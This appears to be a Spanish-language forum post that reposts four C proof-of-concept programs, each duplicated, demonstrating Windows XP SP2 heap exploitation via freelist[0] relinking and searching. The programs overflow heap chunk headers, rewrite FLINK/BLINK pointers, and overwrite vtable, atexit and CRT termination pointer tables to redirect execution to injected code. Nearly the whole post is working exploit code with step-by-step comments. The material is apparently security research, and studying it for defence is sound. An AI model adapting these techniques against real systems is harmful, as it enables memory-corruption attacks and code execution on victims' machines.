Autor
Código:
/*
Sample1.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] ReLinking
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the Last free Chunk.
The header is overwritten with a size large enough for the request.
The FLINK is overwritten with the location that the address of the
split chunk will be returned to.
*/
#include <stdio.h>
#include <windows.h>
DWORD ptr1;
DWORD ptr2;
DWORD func[20];
long hHeap;
void callback1()
{
printf("Callback 1...\n");
}
void callback2()
{
printf("Callback 2...\n");
}
void callback3()
{
printf("Callback 3...\n");
}
void callback4()
{
printf("Callback 4...\n");
}
void BlowHeap()
{
char *a,*b;
char overflow[0x3000];
DWORD newFLINK; // The address that will be overwritten
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);
printf("a=%x\tb=%x\n",a,b);
// Overwrite the last free chunk
printf("Overflowing chunk A into last free chunk\n");
newFLINK = &ptr1; // Set the new flink
newFLINK = newFLINK -4; // Adjust
// Set up overflow
memset(overflow,0x58,0x50);
overflow[0x10] = 0x10; // Size of this block
overflow[0x11] = 0x01;
overflow[0x12] = 0x10; // Size of previous block
overflow[0x13] = 0x01;
overflow[0x14] = 0x99;
overflow[0x15] = 0x99;
overflow[0x16] = 0x99;
overflow[0x17] = 0x99;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
*(DWORD *) &overflow[0x1c] = newFLINK; // Put it in BLINK
// Do the overflow
memcpy(a,overflow,0x50); // Overflow chunk A, overwrite header and data of last free chunk
// When block B is allocated, the last free chunk will be split.
// The address of the split chunk will be written to [newFLINK]
printf("Alloc B\n");
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x5); // Any amount will do as no lookaside/freelist yet
printf("a=%x\tb=%x\n",a,b);
}
void create_vTable()
{
int x;
printf("Creating Virtual Function Table\n");
(DWORD) func[0] = (DWORD) &callback1;
(DWORD) func[1] = (DWORD) &callback2;
(DWORD) func[2] = (DWORD) &callback3;
(DWORD) func[3] = (DWORD) &callback4;
for(x=4;x<20;x++)
(DWORD) func[x] = (DWORD) &callback1;
}
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample1.c\n");
printf("\tExploiting Freelist[0] ReLinking\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0);
printf("Heap created: 0x%xh\n",hHeap);
create_vTable();
printf("vTable @ 0x%xh\n",&func);
ptr1 = func;
ptr2= func;
// Call through the vTable
printf("Doing vTable call\n");
printf("Ptr1 @ 0x%xh set to 0x%xh\n",&ptr1,ptr1);
_asm mov ECX,ptr1
_asm call [ECX+ (4*2)]
BlowHeap();
// Call through the vTable
printf("Doing vTable call\n");
printf("Ptr1 @ 0x%xh set to 0x%xh\n",&ptr1,ptr1);
_asm mov ECX,ptr1
_asm call [ECX+ (4*2)]
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0);
}
Sample1.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] ReLinking
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the Last free Chunk.
The header is overwritten with a size large enough for the request.
The FLINK is overwritten with the location that the address of the
split chunk will be returned to.
*/
#include <stdio.h>
#include <windows.h>
DWORD ptr1;
DWORD ptr2;
DWORD func[20];
long hHeap;
void callback1()
{
printf("Callback 1...\n");
}
void callback2()
{
printf("Callback 2...\n");
}
void callback3()
{
printf("Callback 3...\n");
}
void callback4()
{
printf("Callback 4...\n");
}
void BlowHeap()
{
char *a,*b;
char overflow[0x3000];
DWORD newFLINK; // The address that will be overwritten
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);
printf("a=%x\tb=%x\n",a,b);
// Overwrite the last free chunk
printf("Overflowing chunk A into last free chunk\n");
newFLINK = &ptr1; // Set the new flink
newFLINK = newFLINK -4; // Adjust
// Set up overflow
memset(overflow,0x58,0x50);
overflow[0x10] = 0x10; // Size of this block
overflow[0x11] = 0x01;
overflow[0x12] = 0x10; // Size of previous block
overflow[0x13] = 0x01;
overflow[0x14] = 0x99;
overflow[0x15] = 0x99;
overflow[0x16] = 0x99;
overflow[0x17] = 0x99;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
*(DWORD *) &overflow[0x1c] = newFLINK; // Put it in BLINK
// Do the overflow
memcpy(a,overflow,0x50); // Overflow chunk A, overwrite header and data of last free chunk
// When block B is allocated, the last free chunk will be split.
// The address of the split chunk will be written to [newFLINK]
printf("Alloc B\n");
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x5); // Any amount will do as no lookaside/freelist yet
printf("a=%x\tb=%x\n",a,b);
}
void create_vTable()
{
int x;
printf("Creating Virtual Function Table\n");
(DWORD) func[0] = (DWORD) &callback1;
(DWORD) func[1] = (DWORD) &callback2;
(DWORD) func[2] = (DWORD) &callback3;
(DWORD) func[3] = (DWORD) &callback4;
for(x=4;x<20;x++)
(DWORD) func[x] = (DWORD) &callback1;
}
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample1.c\n");
printf("\tExploiting Freelist[0] ReLinking\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0);
printf("Heap created: 0x%xh\n",hHeap);
create_vTable();
printf("vTable @ 0x%xh\n",&func);
ptr1 = func;
ptr2= func;
// Call through the vTable
printf("Doing vTable call\n");
printf("Ptr1 @ 0x%xh set to 0x%xh\n",&ptr1,ptr1);
_asm mov ECX,ptr1
_asm call [ECX+ (4*2)]
BlowHeap();
// Call through the vTable
printf("Doing vTable call\n");
printf("Ptr1 @ 0x%xh set to 0x%xh\n",&ptr1,ptr1);
_asm mov ECX,ptr1
_asm call [ECX+ (4*2)]
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0);
}
Código:
/*
Sample2.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
*/
#include <stdio.h>
#include <windows.h>
DWORD func[20];
long hHeap;
void callback1()
{
printf("Callback 1...\n");
}
void callback2()
{
printf("Callback 2...\n");
}
void callback3()
{
printf("Callback 3...\n");
}
void callback4()
{
printf("Callback 4...\n");
}
void BlowHeap()
{
char *a,*b,*c;
char overflow[0x3000];
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Alloc B\n"); // Alloc a large chunk so freed to freelist[0]
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x1200);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Alloc C\n"); // Alloc a 2nd chunk so that B is not coalesced
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Freeing b\n"); // Free B to feelist[0]
HeapFree(hHeap,0,b);
printf("Overflowing chunk A\n"); // Overflow chunk A, overwrite header of last free chunk
newFLINK = &func; // Set the new flink
newFLINK += 8; // Adjust
// Set up overflow
memset(overflow,0x48,0x20);
overflow[0x10] = 0x01; // Size of this block (SMALL)
overflow[0x11] = 0x00;
overflow[0x12] = 0x01; // Size of previous block
overflow[0x13] = 0x00;
overflow[0x14] = 0x80;
overflow[0x15] = 0x80;
overflow[0x16] = 0x80;
overflow[0x17] = 0x80;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
// Do the overflow
memcpy(a,overflow,0x20-4); // Overwrite FLINK but not BLINK
// When block B is allocated, the overwritten chunk will be checked.
// The address newFLINK will be returned to the alloc
printf("Alloc B\n");
b = HeapAlloc(hHeap,0,0x20);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Any data written into B will overwrite the data at newFlink
strcpy(b,"XXXXXXXXXXXXXXXX");
}
void create_vTable()
{
int x;
printf("Creating Virtual Function Table\n");
(DWORD) func[0] = (DWORD) &callback1;
(DWORD) func[1] = (DWORD) &callback2;
(DWORD) func[2] = (DWORD) &callback3;
(DWORD) func[3] = (DWORD) &callback4;
for(x=4;x<20;x++)
(DWORD) func[x] = (DWORD) &callback1;
func[0]=5;
func[1]=6;
}
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample2.c\n");
printf("\tExploiting Freelist[0] Searching\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0);
printf("Heap created: 0x%xh\n",hHeap);
create_vTable();
printf("vTable @ 0x%xh\n",&func);
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0);
}
Sample2.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
*/
#include <stdio.h>
#include <windows.h>
DWORD func[20];
long hHeap;
void callback1()
{
printf("Callback 1...\n");
}
void callback2()
{
printf("Callback 2...\n");
}
void callback3()
{
printf("Callback 3...\n");
}
void callback4()
{
printf("Callback 4...\n");
}
void BlowHeap()
{
char *a,*b,*c;
char overflow[0x3000];
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Alloc B\n"); // Alloc a large chunk so freed to freelist[0]
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x1200);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Alloc C\n"); // Alloc a 2nd chunk so that B is not coalesced
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Freeing b\n"); // Free B to feelist[0]
HeapFree(hHeap,0,b);
printf("Overflowing chunk A\n"); // Overflow chunk A, overwrite header of last free chunk
newFLINK = &func; // Set the new flink
newFLINK += 8; // Adjust
// Set up overflow
memset(overflow,0x48,0x20);
overflow[0x10] = 0x01; // Size of this block (SMALL)
overflow[0x11] = 0x00;
overflow[0x12] = 0x01; // Size of previous block
overflow[0x13] = 0x00;
overflow[0x14] = 0x80;
overflow[0x15] = 0x80;
overflow[0x16] = 0x80;
overflow[0x17] = 0x80;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
// Do the overflow
memcpy(a,overflow,0x20-4); // Overwrite FLINK but not BLINK
// When block B is allocated, the overwritten chunk will be checked.
// The address newFLINK will be returned to the alloc
printf("Alloc B\n");
b = HeapAlloc(hHeap,0,0x20);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Any data written into B will overwrite the data at newFlink
strcpy(b,"XXXXXXXXXXXXXXXX");
}
void create_vTable()
{
int x;
printf("Creating Virtual Function Table\n");
(DWORD) func[0] = (DWORD) &callback1;
(DWORD) func[1] = (DWORD) &callback2;
(DWORD) func[2] = (DWORD) &callback3;
(DWORD) func[3] = (DWORD) &callback4;
for(x=4;x<20;x++)
(DWORD) func[x] = (DWORD) &callback1;
func[0]=5;
func[1]=6;
}
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample2.c\n");
printf("\tExploiting Freelist[0] Searching\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0);
printf("Heap created: 0x%xh\n",hHeap);
create_vTable();
printf("vTable @ 0x%xh\n",&func);
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0);
}
Código:
/*
Sample3.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Overwriting atexit pointers
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
To overwrite the atexit() ptr table we will;
1. overwrite a chunk in freelist[0]
2. exploit the freelist[0] searching routine to
return a pointer to the heap freelists
3. overwrite the freelists with a pointer to the atexit() ptr table
4. overwrite the atexit() ptr table to point to a portion of itself
containing the code to execute.
*/
#include <stdio.h>
#include <windows.h>
DWORD func[20];
long hHeap;
void callback1()
{
printf("Callback 1...\n");
}
void callback2()
{
printf("Callback 2...\n");
}
void callback3()
{
printf("Callback 3...\n");
}
void callback4()
{
printf("Callback 4...\n");
}
void BlowHeap()
{
int x;
char *a,*b,*c,*d;
char overflow[0x3000];
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Alloc B\n"); // Alloc a large chunk so freed to freelist[0]
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x1200);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Alloc C\n"); // Alloc a 2nd chunk so that B is not coalesced
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Freeing b\n"); // Free B to feelist[0]
HeapFree(hHeap,0,b);
printf("Overflowing chunk A\n"); // Overflow chunk A, overwrite header of last free chunk
newFLINK = 0x00340198; // Set the new FLINK to the freelists[]
newFLINK += 8; // Adjust
// Set up overflow
memset(overflow,0x48,0x20);
overflow[0x10] = 0x01; // Size of this block (SMALL)
overflow[0x11] = 0x00;
overflow[0x12] = 0x01; // Size of previous block
overflow[0x13] = 0x00;
overflow[0x14] = 0x80;
overflow[0x15] = 0x80;
overflow[0x16] = 0x80;
overflow[0x17] = 0x80;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
// Do the overflow
memcpy(a,overflow,0x20-4); // Overwrite FLINK but not BLINK
printf("Alloc B\n"); // This alloc will return the address of the freelists[]
b = HeapAlloc(hHeap,0,0xCB8); // 3256 bytes
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Set up buffer of input size (3256 btyes)
memset(overflow,0x0,0x3000);
for(x=0;x<256;x+=4)
{
*(DWORD *) &overflow[x] = 0x40C0D0; // Overwite with address of atexit ptrs
}
// copy it in
// This will overwrite the freelist structures
memcpy(b,overflow,256);
// This will return a ptr to the atexit pointers
printf("Alloc D\n");
d = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\td=%x\n",a,b,c,d);
// Now lets overwrite the AtExit Ptr Table
// Set up buffer of input size (48 btyes)
memset(overflow,0xCC,0x30);
*(DWORD *) &overflow[0] = 0x40C0D8+4; // 4 greater than lower pointer
*(DWORD *) &overflow[4] = 0x40C0D8; // Lower Pointer
*(DWORD *) &overflow[8] = 0x40C0D8+4; // ptr to Code to execute
*(DWORD *) &overflow[12]= 0xCCCCCCCC; // Code to execute
// Overwrite atExit Pointers
memcpy(d,overflow,0x30);
}
void create_vTable()
{
int x;
printf("Creating Virtual Function Table\n");
(DWORD) func[0] = (DWORD) &callback1;
(DWORD) func[1] = (DWORD) &callback2;
(DWORD) func[2] = (DWORD) &callback3;
(DWORD) func[3] = (DWORD) &callback4;
for(x=4;x<20;x++)
(DWORD) func[x] = (DWORD) &callback1;
func[0]=5;
func[1]=6;
}
void ExitFunction()
{
printf("Exiting\n");
}
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample3.c\n");
printf("\tExploiting Freelist[0] Searching\n");
printf("\t-Overwriting atexit pointers\n");
printf("===========================================\n\n");
// Set up the atexit function
atexit(ExitFunction);
hHeap = HeapCreate(0,0,0);
printf("Heap created: 0x%xh\n",hHeap);
create_vTable();
printf("vTable @ 0x%xh\n",&func);
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
exit(0);
}
Sample3.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Overwriting atexit pointers
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
To overwrite the atexit() ptr table we will;
1. overwrite a chunk in freelist[0]
2. exploit the freelist[0] searching routine to
return a pointer to the heap freelists
3. overwrite the freelists with a pointer to the atexit() ptr table
4. overwrite the atexit() ptr table to point to a portion of itself
containing the code to execute.
*/
#include <stdio.h>
#include <windows.h>
DWORD func[20];
long hHeap;
void callback1()
{
printf("Callback 1...\n");
}
void callback2()
{
printf("Callback 2...\n");
}
void callback3()
{
printf("Callback 3...\n");
}
void callback4()
{
printf("Callback 4...\n");
}
void BlowHeap()
{
int x;
char *a,*b,*c,*d;
char overflow[0x3000];
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Alloc B\n"); // Alloc a large chunk so freed to freelist[0]
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x1200);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Alloc C\n"); // Alloc a 2nd chunk so that B is not coalesced
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Freeing b\n"); // Free B to feelist[0]
HeapFree(hHeap,0,b);
printf("Overflowing chunk A\n"); // Overflow chunk A, overwrite header of last free chunk
newFLINK = 0x00340198; // Set the new FLINK to the freelists[]
newFLINK += 8; // Adjust
// Set up overflow
memset(overflow,0x48,0x20);
overflow[0x10] = 0x01; // Size of this block (SMALL)
overflow[0x11] = 0x00;
overflow[0x12] = 0x01; // Size of previous block
overflow[0x13] = 0x00;
overflow[0x14] = 0x80;
overflow[0x15] = 0x80;
overflow[0x16] = 0x80;
overflow[0x17] = 0x80;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
// Do the overflow
memcpy(a,overflow,0x20-4); // Overwrite FLINK but not BLINK
printf("Alloc B\n"); // This alloc will return the address of the freelists[]
b = HeapAlloc(hHeap,0,0xCB8); // 3256 bytes
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Set up buffer of input size (3256 btyes)
memset(overflow,0x0,0x3000);
for(x=0;x<256;x+=4)
{
*(DWORD *) &overflow[x] = 0x40C0D0; // Overwite with address of atexit ptrs
}
// copy it in
// This will overwrite the freelist structures
memcpy(b,overflow,256);
// This will return a ptr to the atexit pointers
printf("Alloc D\n");
d = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\td=%x\n",a,b,c,d);
// Now lets overwrite the AtExit Ptr Table
// Set up buffer of input size (48 btyes)
memset(overflow,0xCC,0x30);
*(DWORD *) &overflow[0] = 0x40C0D8+4; // 4 greater than lower pointer
*(DWORD *) &overflow[4] = 0x40C0D8; // Lower Pointer
*(DWORD *) &overflow[8] = 0x40C0D8+4; // ptr to Code to execute
*(DWORD *) &overflow[12]= 0xCCCCCCCC; // Code to execute
// Overwrite atExit Pointers
memcpy(d,overflow,0x30);
}
void create_vTable()
{
int x;
printf("Creating Virtual Function Table\n");
(DWORD) func[0] = (DWORD) &callback1;
(DWORD) func[1] = (DWORD) &callback2;
(DWORD) func[2] = (DWORD) &callback3;
(DWORD) func[3] = (DWORD) &callback4;
for(x=4;x<20;x++)
(DWORD) func[x] = (DWORD) &callback1;
func[0]=5;
func[1]=6;
}
void ExitFunction()
{
printf("Exiting\n");
}
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample3.c\n");
printf("\tExploiting Freelist[0] Searching\n");
printf("\t-Overwriting atexit pointers\n");
printf("===========================================\n\n");
// Set up the atexit function
atexit(ExitFunction);
hHeap = HeapCreate(0,0,0);
printf("Heap created: 0x%xh\n",hHeap);
create_vTable();
printf("vTable @ 0x%xh\n",&func);
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
exit(0);
}
Código:
/*
Sample4.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Overwriting CRT Termination Pointers
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
MSCVRT MUST BE DYNAMICALLY LINKED
To overwrite the termination ptr table we will;
1. overwrite a chunk in freelist[0]
2. exploit the freelist[0] linking routine to overwrite the heap pointer
to the lookaside list [base+0x580]
3. This will cause the lookaside list to contain our pointers to the termination() ptr table
4. overwrite the termination() ptr table to point to a portion of itself
containing the code to execute.
*/
#include <stdio.h>
#include <windows.h>
DWORD func[20];
long hHeap;
void callback1()
{
printf("Callback 1...\n");
}
void callback2()
{
printf("Callback 2...\n");
}
void callback3()
{
printf("Callback 3...\n");
}
void callback4()
{
printf("Callback 4...\n");
}
void BlowHeap()
{
int x;
char *a,*b,*c,*d;
char overflow[0x3000];
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Overwrite the last free chunk
printf("Overflowing chunk A into last free chunk\n");
newFLINK = 0x00340580; // Set the new flink
newFLINK = newFLINK -4; // Adjust
// Set up overflow
memset(overflow,0x58,0x200);
overflow[0x10] = 0x10; // Size of this block
overflow[0x11] = 0x01;
overflow[0x12] = 0x10; // Size of previous block
overflow[0x13] = 0x01;
overflow[0x14] = 0x99;
overflow[0x15] = 0x99;
overflow[0x16] = 0x99;
overflow[0x17] = 0x99;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
*(DWORD *) &overflow[0x1c] = newFLINK; // Put it in BLINK
for(x=32;x<1024;x+=4)
{
*(DWORD *) &overflow[x] = 0x77C6279C; // Overwite free chunk data with address of termination ptrs
}
// Do the overflow
memcpy(a,overflow,0x1024); // Overflow chunk A, overwrite header and data of last free chunk
// When block B is allocated, the last free chunk will be split.
// The address of the split chunk will be written to [newFLINK]
// This will overwrite the pointer to the lookaside list @ [base+0x580h]
printf("Alloc B\n");
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x5); // Any amount will do as no lookaside/freelist yet
printf("a=%x\tb=%x\n",a,b);
// Now another alloc
// This will return a pointer from our overflow data above
// So C will point to the CRT termination pointer table
printf("Alloc C\n"); // Alloc a chunk
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x50);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Now lets overwrite the Termination Ptr Table
memset(overflow,0x0,0x3000);
*(DWORD *) &overflow[0] = 0x77C627A8; // 4 greater than lower pointer
*(DWORD *) &overflow[4] = 0x77C627A4; // Lower Pointer
*(DWORD *) &overflow[8] = 0x77C627A8; // ptr to Code to execute
*(DWORD *) &overflow[12]= 0xCCCCCCCC; // Code to execute
// Overwrite Termination Pointers
strcpy(c,overflow);
}
void create_vTable()
{
int x;
printf("Creating Virtual Function Table\n");
(DWORD) func[0] = (DWORD) &callback1;
(DWORD) func[1] = (DWORD) &callback2;
(DWORD) func[2] = (DWORD) &callback3;
(DWORD) func[3] = (DWORD) &callback4;
for(x=4;x<20;x++)
(DWORD) func[x] = (DWORD) &callback1;
func[0]=5;
func[1]=6;
}
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample4.c\n");
printf("\tExploiting Freelist[0] ReLinking\n");
printf("\t-Overwriting termination pointers\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0);
printf("Heap created: 0x%xh\n",hHeap);
create_vTable();
printf("Callback @ 0x%xh\n",&func);
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0);
}
Sample4.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Overwriting CRT Termination Pointers
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
MSCVRT MUST BE DYNAMICALLY LINKED
To overwrite the termination ptr table we will;
1. overwrite a chunk in freelist[0]
2. exploit the freelist[0] linking routine to overwrite the heap pointer
to the lookaside list [base+0x580]
3. This will cause the lookaside list to contain our pointers to the termination() ptr table
4. overwrite the termination() ptr table to point to a portion of itself
containing the code to execute.
*/
#include <stdio.h>
#include <windows.h>
DWORD func[20];
long hHeap;
void callback1()
{
printf("Callback 1...\n");
}
void callback2()
{
printf("Callback 2...\n");
}
void callback3()
{
printf("Callback 3...\n");
}
void callback4()
{
printf("Callback 4...\n");
}
void BlowHeap()
{
int x;
char *a,*b,*c,*d;
char overflow[0x3000];
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Overwrite the last free chunk
printf("Overflowing chunk A into last free chunk\n");
newFLINK = 0x00340580; // Set the new flink
newFLINK = newFLINK -4; // Adjust
// Set up overflow
memset(overflow,0x58,0x200);
overflow[0x10] = 0x10; // Size of this block
overflow[0x11] = 0x01;
overflow[0x12] = 0x10; // Size of previous block
overflow[0x13] = 0x01;
overflow[0x14] = 0x99;
overflow[0x15] = 0x99;
overflow[0x16] = 0x99;
overflow[0x17] = 0x99;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
*(DWORD *) &overflow[0x1c] = newFLINK; // Put it in BLINK
for(x=32;x<1024;x+=4)
{
*(DWORD *) &overflow[x] = 0x77C6279C; // Overwite free chunk data with address of termination ptrs
}
// Do the overflow
memcpy(a,overflow,0x1024); // Overflow chunk A, overwrite header and data of last free chunk
// When block B is allocated, the last free chunk will be split.
// The address of the split chunk will be written to [newFLINK]
// This will overwrite the pointer to the lookaside list @ [base+0x580h]
printf("Alloc B\n");
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x5); // Any amount will do as no lookaside/freelist yet
printf("a=%x\tb=%x\n",a,b);
// Now another alloc
// This will return a pointer from our overflow data above
// So C will point to the CRT termination pointer table
printf("Alloc C\n"); // Alloc a chunk
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x50);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Now lets overwrite the Termination Ptr Table
memset(overflow,0x0,0x3000);
*(DWORD *) &overflow[0] = 0x77C627A8; // 4 greater than lower pointer
*(DWORD *) &overflow[4] = 0x77C627A4; // Lower Pointer
*(DWORD *) &overflow[8] = 0x77C627A8; // ptr to Code to execute
*(DWORD *) &overflow[12]= 0xCCCCCCCC; // Code to execute
// Overwrite Termination Pointers
strcpy(c,overflow);
}
void create_vTable()
{
int x;
printf("Creating Virtual Function Table\n");
(DWORD) func[0] = (DWORD) &callback1;
(DWORD) func[1] = (DWORD) &callback2;
(DWORD) func[2] = (DWORD) &callback3;
(DWORD) func[3] = (DWORD) &callback4;
for(x=4;x<20;x++)
(DWORD) func[x] = (DWORD) &callback1;
func[0]=5;
func[1]=6;
}
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample4.c\n");
printf("\tExploiting Freelist[0] ReLinking\n");
printf("\t-Overwriting termination pointers\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0);
printf("Heap created: 0x%xh\n",hHeap);
create_vTable();
printf("Callback @ 0x%xh\n",&func);
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0);
}
En línea
, es mas facil el manejo, asi solo lo descargas, solo una sugerencia, o favor.
